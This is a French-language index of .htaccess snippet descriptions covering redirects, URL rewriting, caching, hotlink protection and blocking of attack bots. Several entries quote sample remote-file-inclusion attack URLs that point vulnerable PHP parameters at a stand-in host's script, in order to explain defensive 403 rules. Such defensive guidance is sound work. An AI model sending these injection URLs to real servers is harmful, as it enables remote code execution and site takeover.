# | Nom + Description | Versions PHP | Date | |
---|---|---|---|---|
86. |
![]() |
1 |
02 Mai 2008 | |
Pour éviter le contenu dupliqué, il est indispensable de ne pas pouvoir accéder au site avec et sans www. La majorité des webmasters font le choix du site avec www car les internautes y sont habitués. Pour empêcher l'accès avec www, il faut définir une redirection permanente. Ainsi il n'existe pas deux pages identiques et donc pas de risque... | ||||
85. |
![]() |
0 |
02 Mai 2008 | |
Pour éviter le duplicate content, il est indispensable d'empêcher l'accès aux répertoires par l'index. Pour rediriger une url du type http://www.example.com/index.hml vers http://www.example.com/, il est possible d'ajouter ce code dans le fichier .htaccess à la racine du site. La condition sur THE_REQUEST permet d'éviter que la redirection... | ||||
84. |
![]() |
0 |
04 Mai 2008 | |
Vous cherchez à rediriger votre site entier vers les pages contenant le sous-domaine www. Ce code devrait vous y aider en ajoutant automatiquement www. s'il est manquant. Le flag R=301 est optionnel. Si vous ne voulez pas de redirection définitive, vous pouvez la retirer en enlevant le flag R=301. Vous ne risquez donc pas un contenu dupliqué... | ||||
83. |
![]() |
0 |
07 Mai 2008 | |
Pour rediriger tous un répertoire et ses sous-répertoires vers la racine, il faut définir une règle de réécriture avec le flag R=301. Toutes les url commençant par http://www.example.com/unrepertoire/ sont redirigée de manière permanente vers http://www.example.com/ Deux solutions sont possibles. La première consiste à définir la... | ||||
82. |
![]() |
0 |
07 Mai 2008 | |
Pour déplacer tout une arborescence vers un autre endroit sans changer la structure ni les paramètres il suffit d'utiliser un RedirectPermanent. Le but est de déplacer par exemple les url commençant par http://www.example.com/ici/ vers http://www.example.com/la/bas/. Ainsi, l'url http://www.example.com/ici/unrepertoire/unpage.html?id=3 est... | ||||
81. |
![]() |
3 |
08 Mai 2008 | |
Il est possible de réécrire les url des sous-domaine vers le domaine principal en utilisant une variable contenant son nom. Vous souhaitez par exemple réécrire les url du type http://sousdomaine.example.com/fichier.php en affichant le contenu de la page http://www.example.com/fichier.php?site=sousdomaine. La condition pour que cela marche est... | ||||
80. |
![]() |
0 |
08 Mai 2008 | |
Si tous vos sous-domaines pointent vers un répertoire contenant un répertoire au nom de chaque sous-domaine, il est possible d'utiliser une règle de réécriture pour afficher pour chaque sous-domaine la page se trouvant dans le répertoire à son nom. Par exemple l'url http://sousdomaine.example.com/page1.html va afficher le contenu de la page... | ||||
79. |
![]() |
0 |
10 Mai 2008 | |
Pour qu'une RewriteRule ne s'applique que si le script existe il faut ajouter une condition testant la variable REQUEST_FILENAME. L'exemple suivant permet d'appeler un script qui fait la compression des fichiers texte avant de les envoyer. Il faut donc vérifier que le fichier existe pour pouvoir le compresser. | ||||
78. |
![]() |
0 |
10 Mai 2008 | |
Pour qu'une RewriteRule ne s'applique que si le script n'existe pas il faut ajouter une condition testant la variable REQUEST_FILENAME. L'option -f permet de tester que le fichier existe et le ! inverse le test. Avec une règle de réécriture très général, un tel test est souvent obligatoire. | ||||
77. |
![]() |
0 |
10 Mai 2008 | |
Pour qu'une RewriteRule ne soit exécutée que si la requête ne correspond pas à un répertoire existant, il suffit d'ajouter une condition qui test la variable REQUEST_FILENAME. Cet exemple permet de faire un système de répertoire virtuel avec une règle de réécriture. Toutes les url se terminant par un / et ne correspondant pas à un... | ||||
76. |
![]() |
0 |
10 Mai 2008 | |
Pour qu'une règle de réécriture ne soit appliquée que si la requête ne correspond ni a un fichier existant ni à un répertoire existant, il suffit d'ajouter deux conditions testant la variable REQUEST_FILENAME. | ||||
75. |
![]() |
0 |
11 Mai 2008 | |
Pour rediriger de manière permanente tout un répertoire vers un sous domaine deux solutions sont possibles. La première utilise l'instruction RedirectPermanent et permet de rediriger le répertoire /wordpress/ vers le sous-domaine blog.example.com. La deuxième utilise une règle de réécriture (qui nécessite donc que le moteur de réécriture... | ||||
74. |
![]() |
0 |
12 Mai 2008 | |
Les sites internet sont souvent attaqués par des robots qui cherchent des failles de sécurité. Voici un exemple de protection qui permet de bloquer les tentatives d'attaques du type http://www.example.com/?mosConfig_absolute_path=http://www.sitepourri.com/url.txt? On test donc que les paramètres d'url contiennent la variable... | ||||
73. |
![]() |
0 |
12 Mai 2008 | |
Pour renvoyer un Content-Type différent quand on utilise une règle de réécriture il est possible d'utiliser l'instruction AddType. Cet exemple permet de définir comme fichier xml un flux rss. La réécriture permet d'avoir une url http://www.example.com/flux.rss qui appelle un script flux_rss.php. Il est également possible d'utiliser la... | ||||
72. |
![]() |
0 |
13 Mai 2008 | |
Les robots des hackers qui crawlent le web essayent de trouver des failles de sécurité à vos scripts pour injecter en générale des urls. L'un de ces robots utilise un script de sondage avec un paramètre repertoire_visiteur. Les urls sont sous la forme:... | ||||
71. |
![]() |
0 |
13 Mai 2008 | |
Il arrive que certaines adresses IP génèrent trop de requêtes et saturent le serveur. Il est possible de les bloquer en utilisant le fichier .htaccess. La première consiste à utiliser l'instruction Deny. L'instruction Order permet d'indiquer dans quel sens se trouvent les instructions Allow et Deny qui suivent. On autorise toutes les... | ||||
70. |
![]() |
0 |
14 Mai 2008 | |
Par défaut, l'accès à un répertoire ne contenant pas de fichier index.html, index.php, index.htm... affiche la liste des fichiers de ce répertoire. Pour renvoyer une erreur 403 (accès interdit) à la place, il suffit d'ajouter cette petite ligne dans le fichier .htaccess. Il devient donc impossible de connaître le contenu d'un répertoire... | ||||
69. |
![]() |
0 |
14 Mai 2008 | |
Pour maitriser l'affiche du contenu d'un répertoire, il est possible d'utiliser la directive DirectoryIndex. Elle permet d'indiquer les fichiers à afficher quand on tape l'url du répertoire. Par défaut on affiche le fichier index.html, index.htm ou index.php si ils existent dans le répertoire. Cet exemple montre comment afficher le contenu... | ||||
68. |
![]() |
0 |
14 Mai 2008 | |
Il est possible d'empêcher l'accès à un répertoire contenant par exemple des scripts d'administration en utilisant un mot de passe. Pour cela il faut ajouter ces quelques lignes dans le fichier .htaccess de ce répertoire. La directive AuthUserFile indique ou se trouve le fichier .htpasswd contenant les mots de passe. Le fichier .htpasswd doit... | ||||
67. |
![]() |
0 |
15 Mai 2008 | |
Cette faille de sécurité est exploitée par des robots en utilisant le script admin_smilies.php avec le paramètre phpbb_root_path. Pour bloquer ces tentatives de piratage du site il faut ajouter une petite règle dans le fichier .htaccess. Ainsi un code retour 403 (accès interdit) est retourné si le paramètre phpbb_root_path contient une url... | ||||
66. |
![]() |
0 |
18 Mai 2008 | |
Il est possible de prendre le contrôle d'un site disposant d'un script admin.php avec un paramètre Htmls. En effet ce paramètre permet de faire exécuter un script externe. Pour interdire l'exécution par un hacker de ce script externe il est indispensable d'ajouter une règle dans le fichier .htaccess qui retourne un code retour 403. Les url... | ||||
65. |
![]() |
0 |
21 Mai 2008 | |
Si vous utilisez un script setup/header.php ayant un paramètre css_path, vous pouvez être victimes d'une faille de sécurité. Grâce à ce script il est peut-être possible d'exécuter un script externe avec une url du style http://www.example.com/setup/header.php?css_path=http://www.sitepourri.com/url.txt? Il faut donc tester que le paramètre... | ||||
64. |
![]() |
0 |
23 Mai 2008 | |
De moins en moins de connaissances sont nécessaires pour faire un site internet grâce aux différents CMS et templates gratuits. Le problème est que quasiment personne ne vérifie ce qu'il installe sur son site. Vous pouvez ainsi vous retrouver avec un script qui permet d'exécuter du code malveillant. Si vous disposez d'un script... | ||||
63. |
![]() |
0 |
23 Mai 2008 | |
Les hackers sont très actifs et ils disposent d'un nombre important de portes d'entrée pour prendre le contrôle d'un site. Cette règle .htaccess permet d'éviter les attaques avec un script aedatingCMS.php. Le flag F renvoie un code retour 403 (accès interdit) si le paramètre dir[inc] contient une url externe. | ||||
62. |
![]() |
1 |
23 Mai 2008 | |
En suivant les erreurs 404 on se rend compte du nombre important de tentatives de prise de contrôle d'un site par les hackers. Certains scripts disposent d'un paramètre permettant d'exécuter du code qui ne se trouve pas sur votre site. Le code ci-dessous vous permet d'éviter cela avec le script bbs.lib.inc.php. Ainsi, vous pouvez ajouter ces... | ||||
61. |
![]() |
0 |
23 Mai 2008 | |
Les failles de sécurité sont nombreuses avec la multiplication des CMS, blogs, forums et des addons. Ce nouvel exemple exploite le paramètre no_url. Pour éviter les mauvaises surprises si vous utilisez ce script il est indispensable d'ajouter deux petites lignes dans le fichier .htaccess pour bloquer des tentatives de piratage avec des url du... | ||||
60. |
![]() |
0 |
24 Mai 2008 | |
La librairie perl libwww est une interface de programmation d'application (API). Elle fournit un ensemble de fonctions pour l'accès à des données internet. Vous pouvez ainsi faire un moteur de recherche à partir de cette librairie. Malheureusement elle est souvent utilisée par les hackers pour faire un scanner de vulnérabilité par RFI... | ||||
59. |
![]() |
0 |
24 Mai 2008 | |
De plus en plus de personnes font un site internet en pillant le travaille des autres. Le plus souvent il s'agit de MFA (made for adsense) c'est à dire des sites fait pour gagner de l'argent facilement avec la publicité. Pour ceux récupérant le texte, il n'y a pas grand chose à faire mis à part regarder les résultats dans les SERP (Search... | ||||
58. |
![]() |
3 |
24 Mai 2008 | |
Certains créateurs de site ne se compliquent pas pour obtenir du contenu de qualité rapidement : ils affichent les photos des autres. Ils utilisent ainsi vos images mais ils profitent également de votre bande passante. Pour être averti dans un tel cas et pouvoir agir vous pouvez définir une règle de réécriture. Les images vont donc... | ||||
57. |
![]() |
0 |
24 Mai 2008 | |
Il est fréquent de se faire voler les images d'un site internet. Pour éviter qu'elles ne soient affichées sur un site non autorisé il est possible d'utiliser une règle dans le fichier .htaccess. Cette règle de réécriture affiche une image voleur.png à la place des images avec une extension gif, png, jpg ou jpeg. Les conditions qui... | ||||
56. |
![]() |
0 |
25 Mai 2008 | |
Les attaques par inclusion de fichier php distant sont nombreuses et les pirates d'internet en profitent. Le script booth.php présent dans Advanced Poll (PHP) permet d'inclure du code ne se trouvant pas sur votre serveur si register_globals vaut OFF. Le paramètre include_path est utilisé pour définir un chemin d'include distant. Les url... | ||||
55. |
![]() |
0 |
25 Mai 2008 | |
Votre site est peut-être vulnérable si vous avez WebCalendar. En effet vous risquez d'être victime d'une attaque par inclusion de code externe (remote file include vulnerability). Les url à l'origine de ces hacks sont de la forme : http://www.example.om/tools/send_reminders.php?includedir=http://www.sitepourri.com/fichier.txt? Une petite... | ||||
54. |
![]() |
0 |
25 Mai 2008 | |
Les tentatives de hacker sont nombreuses et se font souvent sur le même modèle. Un paramètre permet dinclude un script externe. Il est ainsi possible dexécuter nimporte quel code sur votre serveur. Le hacker peut donc faire tout ce quil veut sur votre site. Les url se terminent souvent par un ? car ce caractère transforme tout ce qui... | ||||
53. |
![]() |
0 |
26 Mai 2008 | |
Pour avoir du php avec une extension html, il y a deux solutions : La première consiste à indiquer au serveur que les fichiers avec une extensions html doivent être traités comme du php en utilisant la directive AddType. La deuxième solution consiste à renommer les fichiers html en php et à utiliser une règle de réécriture. La ligne... | ||||
52. |
![]() |
1 |
26 Mai 2008 | |
La gestion de cache se fait en sauvegardant les pages html dynamiques pour ne pas les recalculer à chaque accès. Pour cela, nous allons sauvegarder nos page dans un répertoire /cache. Par exemple l'url http://www.example.com/une-page.html va être mémorisée en cache dans /cache/une-page.html. La sauvegarde de la page dans le cache n'est pas... | ||||
51. |
![]() |
0 |
27 Mai 2008 | |
Les fichiers .htaccess et .htpasswd sont important et il est important que personne ne puisse les visualiser depuis un navigateur. Le fichier .htpasswd contient les users et mots de passe. Il ne faut donc pas que quelqu'un puisse le visualiser. Le fichier .htaccess contient également beaucoup d'informations sur votre site. Si vous pouvez les... | ||||
50. |
![]() |
0 |
29 Mai 2008 | |
Il est très fréquent de retrouver ses images sur un autre site sans avoir donné son accord. La meilleure solution pour éviter cela est d'ajouter un logo en surimpression indiquant que l'image vient de votre site. Il y de fortes chances pour que les voleurs passent leur chemin pour prendre celles d'un autre sans watermark. Pour ajouter le filigrane... | ||||
49. |
![]() |
0 |
30 Mai 2008 | |
Les failles de sécurité sont nombreuses dans les scripts php. Celle ci permet à un hacker d'éxécuter sur votre serveur un include externe par l'intermédiaire du paramètre error du script errors.php. Pour vous prémunir d'une prise de contrôle de votre site par un pirate du net il vous faut ajouter ces deux lignes dans votre fichier... | ||||
48. |
![]() |
0 |
30 Mai 2008 | |
Chez certains hébergeurs comme OVH ou infomaniak l'option MultiViews est active par défaut. Cette option met en uvre la négociation de contenu. Elle permet par exemple en appelant une url http://www.example.com/unepage de rechercher le script le plus approprié. Si a page http://www.example.com/unepage.html existe elle va être retournée... | ||||
47. |
![]() |
0 |
30 Mai 2008 | |
Pour tester un site internet avant de le mettre en ligne, il est souvent nécessaire d'installer un serveur http sur son PC. Pour cela WampServer est parfait. L'installation des fichiers du site se fait par exemple dans un répertoire monsite dans le répertoire www de Wamp. ainsi pour que les réécritures fonctionnent il ne faut pas oublier de... | ||||
46. |
![]() |
0 |
31 Mai 2008 | |
Il est possible dans certains cas de faire exécuter du code malveillant avec le script addlink.php3 et un paramètre REP_CLASS. En effet si le paramètre register_globals est à on, la variable $REP_CLASS est initialisée avec le paramètre GET. Comme cette variable sert de préfixe au chemin des includes du script addlink.php3 il est facile... | ||||
45. |
![]() |
0 |
31 Mai 2008 | |
Pour renvoyer automatiquement une page vers une url contenant la date du jour il est possible d'utiliser les variables système de date et heure. Dans cet exemple nous allons faire une redirection permanente de la page http://www.example.com/calendrier/ vers http://www.example.com/calendrier/AAAA-MM-JJ.html ou AAAA, MM et JJ correspondent à... | ||||
44. |
![]() |
0 |
31 Mai 2008 | |
Cette faille de sécurité par RFI (remote file include) existe dans le composant mosDirectory de joomla. La vulnérabilité concerne le script mod_pxt_latest.php. Les url concernées sont de la forme : http://www.example.com/com_directory/modules/mod_pxt_latest.php? GLOBALS[mosConfig_absolute_path]=http://www.sitepourri.com/page.txt?? | ||||
43. |
![]() |
0 |
02 Juin 2008 | |
Il est possible d'exploiter cette faille de sécurité sur le script stats.inc.php en utilisant le paramètre prefix. Ce paramètre comme son nom l'indique préfixe les chemins de fichier dans les include. Si vous retourner un code retour 403 (accès interdit), vous être tranquille. | ||||
42. |
![]() |
0 |
02 Juin 2008 | |
Vous pouvez être victime d'une attaque grâce au script smarty.php s'il est appelé avec un paramètre full_path_to_public_program. Si register globals est ON, ce paramètre indique un chemin qui sert de préfixe dans une instruction require. Il faut donc ajouter ces deux lignes dans le fichier .htaccess pour renvoyer un code retour 403... | ||||
41. |
![]() |
0 |
03 Juin 2008 | |
Si AllowOverride est autorisé sur le site entier, le serveur doit vérifier chaque répertoire pour tenir compte des fichiers .htaccess. Pour éviter cela, il est possible de ne définir cette option que pour les répertoires souhaités. Ce paramétrage se fait dans le fichier de configuration du serveur. | ||||
40. |
![]() |
0 |
03 Juin 2008 | |
Il est possible de définir un jeu de caractères (charset) par défaut. Il sera renvoyé par le serveur avec le type mime. Le définir par défaut peut permettre d'éviter certaines erreurs 500. Dans cet exemple nous définissons UTF-8 par défaut. Le Content-Type sera donc égal à "text/html; charset=utf-8". Il est aussi possible de changer... | ||||
39. |
![]() |
0 |
03 Juin 2008 | |
Pour préserver de la bande passante, il est possible de compresser à la volée les pages envoyées par le serveur. Si cette option est mise à "On" dans php.ini ou dans la configuration d'Apache, les page sont compressées (si le navigateur l'accepte). Pour indiquer qu'on autorise un contenu compressé il faut envoyer un entête HTTP... | ||||
38. |
![]() |
0 |
03 Juin 2008 | |
La directive ServerSignature permet la configuration d'une ligne de bas de page pour les documents générés par le serveur (messages d'erreur, liste des répertoire ftp, affichage de mod_info, ...) L'utilité de l'emploi d'une telle ligne apparaît dans la cas d'enchaînement de proxy, où l'utilisateur souvent n'a aucune possibilité de... | ||||
37. |
![]() |
0 |
04 Juin 2008 | |
Vous pouvez bloquer l'accès à certains fichiers sensibles ou que vous stocker pour faire une copie de sauvegarde. Pour les bloquer vous pouvez ajouter ces quelques lignes dans votre fichier .htaccess. Dans cet exemple nous bloquons l'accès aux fichiers apache, aux animations source flash, aux scripts shell, aux fichiers log ou aux sauvegardes de... | ||||
36. |
![]() |
0 |
04 Juin 2008 | |
Si le module speling est chargé, il est possible de corriger automatiquement les erreurs de saisie dans les url : les dysorthographies. Par exemple si vous avez une image qui se nomme photo.jpeg et que vous tapez photo.jpg sans le "e", vous avez normalement une erreur si le module speling est désactivé. S'il est activé vous être... | ||||
35. |
![]() |
1 |
04 Juin 2008 | |
Cette vulnérabilité touche le script info.inc.php qui contient des chemins d'includes préfixés par la variable $cfg[ThemePath]. Si register global est on, il est ainsi possible de faire remplacer les includes par des scripts externes. Ces lignes dans un fichier .htaccess permettent de se protéger d'une inclusion de fichier distant en... | ||||
34. |
![]() |
0 |
07 Juin 2008 | |
La protection d'un répertoire par mot de passe est différente chez free. En effet la syntaxe dans le fichier .htaccess diffère légèrement : la directive AuthUserFile est remplacée par PerlSetVar. Le chemin du fichier .htpasswd doit être relatif à la racine du site. Dans cet exemple nous allons protéger le répertoire admin/ à la racine... | ||||
33. |
![]() |
0 |
08 Juin 2008 | |
Votre site est peut être une victime possible de cette faille de sécurité. Les url sont de la forme http://www.example.com/%3Cstring%3Ehttp://sitepourri.com/fichier.txt?? Pour vous protéger il suffit d'une petite règle dans le fichier .htaccess qui retourne une erreur 403 à chaque tentatives. | ||||
32. |
![]() |
0 |
09 Juin 2008 | |
Vous pouvez être victime d'un hacker qui utilise l'inclusion de fichier distant pour exécuter le code qu'il veut sur votre serveur. Le paramètre include_path permet de préfixer le chemin des fichiers passé comme paramètre de la fonction include. Cette faille ne concerne que les site dont le paramètre register globals est à on. Pour vous... | ||||
31. |
![]() |
0 |
09 Juin 2008 | |
Le script se trouve peut-être sur votre site géré par open-medium.CMS en version 0.25. La faille touche les sites dont le paramètre register_globals est à on. Une petite règle dans le fichier .htaccess permet de renvoyer un code retour 403. Les url concernées sont de la forme : ... | ||||
30. |
![]() |
0 |
09 Juin 2008 | |
Les sites à base de CMS et de composant disponibles gratuitement sur internet sont sensibles aux attaques et aux vulnérabilités par inclusion de fichier distant (RFI). En effet leur code est connu de tous et analysé par les hackers pour détecter des failles. Celle-ci touche comme souvent les script contenant des chemin d'includes préfixés... | ||||
29. |
![]() |
0 |
09 Juin 2008 | |
Pour autoriser l'accès qu'à certains types de fichier il faut définir plusieurs groupes de directives. Un premier qui interdit l'accès à tous les fichiers et un deuxième qui n'autorise que les fichiers ayant l'extension que nous souhaitons. Comme l'option par défaut est "Satisfy all" c'est à dire qu'il faut que toutes les conditions soient... | ||||
28. |
![]() |
2 |
11 Juin 2008 | |
Il est parfois nécessaire de renvoyer tout un site ou une arborescence vers une url particulière. Pour cela, deux solutions sont possibles. La première utilise la directive RedirectMatch et donc le mod_alias. La deuxième utilise une règle de réécriture du mod_rewrite. Nous utilisons le statut "seeother" (303) qui indique que la ressource a... | ||||
27. |
![]() |
1 |
15 Juin 2008 | |
Le CMS mambo peut être victime d'attaque par inclusion de fichiers externes. La prise de contrôle de votre site en est le but ultime. Le script concerné est image_upload.php avec un paramèyre sbp. Cette petite règle dans le fichier .htaccess vous protégera car il renverra un code 403 (accès interdit) aux hackers. | ||||
26. |
![]() |
0 |
17 Juin 2008 | |
Votre site peut être victime de hacking par inclusion de fichiers distants. Pour cela il faut que register globals soit à on. Dans ce cas les paramètres GET de l'url sont déclarés comme des variables accessibles par leur nom. Le paramètre includedir permet ici de définir le préfixe des chemins dans l'instruction include. Cette règle dans... | ||||
25. |
![]() |
1 |
21 Juin 2008 | |
Pour obliger l'accès explicite par le fichier index il suffit d'une règle simple. Il faut tester l'URI pour vérifier qu'elle se termine par un "/". Dans ce cas une règle de redirection renvoie vers index.php. Le flag R indique une redirection temporaire (302). Pour faire une redirection permanente (301) il suffit de mettre R=301 à la place. | ||||
24. |
![]() |
0 |
21 Juin 2008 | |
Pour renommer une page contenant deux paramètres nous allons définir une règle associée à une condition sur la chaîne de requête GET. Dans cet exemple nous renommons /ancienne_page.php?oldparam1=p1&oldparam2=p2 en /nouvelle_page.php?newparam1=p1&newparam2=p2 en utilisant une redirection permanente (301). | ||||
23. |
![]() |
1 |
21 Juin 2008 | |
La gestion des sites multi-langues peut se faire de différentes façons : avec des sous domaines, ou des extensions de domaines différentes. Cet exemple est basé sur une gestion multi-langue par sous-répertoire avec deux répertoires /fr/ et /en/. Si le site est accédé par la racine ou un répertoire différent de /fr/ ou /en/, une... | ||||
22. |
![]() |
3 |
22 Juin 2008 | |
Les hackers exploitent souvent la facilité qui consiste à définir les variables GET ou POST en variables globales. Par exemple la variable $_GET['var1'] est également accessible par $var1. Le cas le plus fréquent d'exploitation est l'utilisation d'une variable préfixant le chemin des includes comme : include($prefix_path .... | ||||
21. |
![]() |
3 |
03 Juil 2008 | |
Si vous n'avez par exemple qu'un blog sur votre site et qu'il se trouve dans un répertoire blog, il est possible que vous ayez besoin de renvoyer les visiteurs arrivant à la racine du site vers ce répertoire. Remarque: A partir de la version 2 d'apache l'url se terminant par / et celle se terminant par /index.php sont considérées comme... | ||||
20. |
![]() |
0 |
07 Juil 2008 | |
Il n'est pas possible d'avoir plus de 9 rétroréférences avec le motif d'une RewriteRule. Ainsi $10 ne correspond pas à la dixième rétroréférence mais correspond à $1 suivi d'un 0. Pour contourner le problème deux solutions sont possibles. La première est de regrouper les motifs pour faire le traitement en php (avec par exemple... | ||||
19. |
![]() |
3 |
09 Juil 2008 | |
Pour afficher une version d'une page le jour et une autre la nuit il est possible de tester les variables d'heure dans une condition de réécriture. Lors de l'accès à la page /page.html le contenu affiché correspondra à /page-jour.html si l'heure est comprise entre 8H et 18H et à /page-nuit.html sinon. | ||||
18. |
![]() |
2 |
08 Avril 2009 | |
Le principe est simple, vous allez dans vos logs bruts de votre site et vous notez soigneusement les adresses ip des serveurs qui vous spamment. ensuite vous remplissez le tableau php ci dessous avec ces même adresses IP et vous placez le code php tout en haut de vos script php. N'oubliez pas d'indiquer l'adresse de redirection dans votre code... | ||||
17. |
![]() |
0 |
15 Avril 2009 | |
C'est un code simple que vous pouvez mettre dans votre fichier .htaccess pour bloquer les spammeur qui vous vide votre bande passante. | ||||
16. |
![]() |
2 |
22 Juil 2009 | |
Pour stopper des sites qui spamment la meilleure solution est de prendre le code .htaccess car il s'installe facilement. Puis en le placant à la racine de votre site il sera opérationnel sur chacune des pages de votre site. Si votre choix se porte vers le code PHP. Il doit être placé impérativement tout en haut de chaque pages du site.... | ||||
15. |
![]() |
0 |
29 Juil 2009 | |
Il est parfois nécessaire de bloquer certains robots qui ne respectent pas le fichier robots.txt, qui tentent de pirater le site ou qui génèrent trop d'erreurs 404. Dans cet exemple nous allons bloquer le navigateur betaBot qui génère trop d'erreur 404 ainsi que les user-agent libwww-perl/* et Mozilla/4.0 ou Mozilla/5.0 qui sont à l'origine... | ||||
14. |
![]() |
0 |
29 Juil 2009 | |
Pour éviter de charger trop souvent une url statique qui ne change jamais il est possible d'utiliser le module Apache mod_expires. Ce module se charge d'ajouter un entête HTTP en renvoyant une page internet. Cet entête est du style : Expires: Sat, 27 Jul 2019 13:18:17 GMT. Cette technique est à utiliser uniquement si vous gérer des versions... | ||||
13. |
![]() |
0 |
17 Jan 2010 | |
Ce code vous permet d'économiser de la bande passante et de rendre l'affichage de votre site beaucoup plus rapide pour les personnes revenant plusieurs fois par mois. 2592000 secondes = 30 jours Code a placer dans le fichier .htaccess de votre site | ||||
12. |
![]() |
0 |
08 Mars 2010 | |
Si quelque chose dans votre réécriture cause une boucle infinie et vous ne savez pas comment l'arrêter alors vous pouvez utiliser ce bout de code. | ||||
11. |
![]() |
0 |
08 Mars 2010 | |
Bloquer l'accés d'un ou de plusieurs fichiers voir du site tout en entier selon les heures de la journée. | ||||
10. |
![]() |
0 |
08 Mars 2010 | |
Pour rediriger un site vers un autre domaine tout en gardant l'url d'origine dans la barre du navigateur il faut utiliser le module mod_proxy d'apache et l'option [P] (mode proxy). Ou bien utiliser la directive ProxyPass du module mod_proxy d'Apache. a noter: Dans les deux cas le mod_proxy doit être activé. | ||||
09. |
![]() |
0 |
24 Jan 2011 | |
Il arrive souvent que les moteurs indexent des pages de votre sous domaine mais à partir du répertoire. Pour contrer ce problème il vous suffit d'ajouter ces 2 lignes de code dans le fichier .htaccess de votre sous domaine, le fichier .htaccess qui se trouve dans le répertoire ou se trouve les fichiers de votre sous domaine. | ||||
08. |
![]() |
0 |
24 Jan 2011 | |
Voici un exemple concret de modification du nom de paramètres dans une url. Facebook permet d'ajouter un attribut ref="votre_ref" au bouton like. Vous pouvez par exemple donner la valeur "facebook" à cet attribut ou indiquer en plus une notion de position dans la page. Ainsi le lien visible sur le mur d'une personne qui a aimé dispose de deux... | ||||
07. |
![]() |
1 |
26 Jan 2011 | |
Vous faites la maintenance de votre site et vous voulez que les visiteurs soit rediriger sur une page qui signale la maintenance du site, pendant que vous avez accès à l'ensemble du site pour le maintenir. Pour cela vous devez connaitre l'adresse IP de votre serveur, faire une page de maintenance et ajouter ce code au début de votre fichier... | ||||
06. |
![]() |
0 |
16 Sept 2011 | |
Pour éviter le duplicate content il est indispensable de ne pas afficher le même contenu sur deux domaines différents. La meilleure solution quand on possède plusieurs déclinaisons de noms de domaines pour le même contenu est donc de définir un domaine principal et rediriger tous les autres vers celui-ci. Si on se contente d'une redirection... | ||||
05. |
![]() |
5 |
02 Nov 2011 | |
Google permet de créer facilement des applications via son service App Engine. Malheureusement il héberge aussi de nombreux proxy qui profitent des serveurs puissants de Google pour afficher des copies de nombreux sites. Ces pages sont très facilement indexées et génèrent du duplicate content. La solution pour les bloquer tous c'est donc... | ||||
04. |
![]() |
1 |
03 Juil 2012 | |
Une directive RewriteCond ne s'appliquant qu'à la RewriteRule qui suit immédiatement, il est parfois gênant de devoir répéter une condition plusieurs fois. Cela alourdit le fichier .htaccess pour rien. Pour éviter cette contrainte il est possible d'utiliser une astuce qui consiste à inverser la condition pour ne pas appliquer nos règles... | ||||
03. |
![]() |
4 |
09 Avril 2013 | |
Il est parfois utile de pouvoir rediriger l'accès à des pages sécurisées vers la version non sécurisée. C'est utile pour éviter le duplicate content quand une même page est accessible via http et https. Pour les sites qui n'ont pas besoin d'être sécurisés il est même préférable de mettre en place la redirection https vers http (tout... | ||||
02. |
![]() |
2 |
21 Mai 2013 | |
CODE 1 Ce code redirige votre site vers son nouveau nom de domaine. Attention ce code ne tient pas compte des pages profondes. Toute les pages seront redirigés vers la racine du nouveau nom de domaine. CODE 2 Idem, ce code redirige votre site vers son nouveau nom de domaine. Ce code tient compte des pages profondes. Toute les pages... | ||||
01. |
![]() |
0 |
16 Fév 2019 | |
Rediriger HTTP vers HTTPS depuis le .htaccess Avant de faire la redirection HTTPS, vérifier bien que votre domaine possède un certificat SSL. |